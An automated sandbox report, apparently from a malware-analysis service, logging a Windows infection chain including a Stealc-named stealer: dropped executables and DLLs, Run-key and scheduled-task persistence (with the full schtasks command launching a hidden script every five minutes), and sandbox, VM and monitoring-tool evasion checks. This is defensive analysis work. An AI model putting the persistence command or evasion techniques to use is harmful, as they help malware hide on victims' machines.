Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File created: C:\Users\user\AppData\Local\Temp\POSMOJBFP9W4F4JKM6CCW190HW6F0P.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File created: C:\Users\user\AppData\Local\Temp\J4EDANXSATRMSXZUEQ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\splwow64[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File created: C:\Users\user\AppData\Local\Temp\CC7V0PUTO3B4JOR1523VPRJQN904A.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\new_v8[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	File created: C:\ProgramData\LgAmARwZ\Application.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1bd0484d71.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f6f4816752.exe			Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Window searched: window name: Regmonclass

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f6f4816752.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f6f4816752.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1bd0484d71.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1bd0484d71.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

6_2_00F29860

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_6-90089

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	System information queried: FirmwareTableInformation

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 785364
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: BFF62F
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 7CDA53
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 7D5AD4
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: BE8559
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: B11707
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 85BB4B
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 8AF1DA

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBAD58 second address: EBAD7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FAF78D3F536h 0x0000000b jng 00007FAF78D3F526h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBAD7E second address: EBAD83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBAF26 second address: EBAF2C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBAF2C second address: EBAF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FAF7914BEC6h 0x0000000d jmp 00007FAF7914BECFh 0x00000012 popad 0x00000013 rdtsc
